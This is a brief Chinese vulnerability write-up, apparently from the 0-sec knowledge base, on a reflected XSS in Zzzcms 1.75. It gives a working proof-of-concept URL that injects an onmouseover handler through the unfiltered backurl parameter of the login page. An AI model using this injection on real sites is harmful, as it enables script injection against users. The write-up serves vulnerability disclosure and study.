Zzzcms 1.75 xss漏洞

一、漏洞简介

二、漏洞影响

Zzzcms 1.75

三、复现过程

http://www.0-sec.org/plugins/template/login.php?backurl=1%20onmouseover%3dalert(9516)%20y%3d

该onmouseover事件在移动到登录注册时会触发

image

对传入的backurl并没有做任何防护

image

零组资料文库 all right reserved,powered by 0-sec.org未经授权禁止转载 2020-03-02 14:30:07

results matching ""

    No results matching ""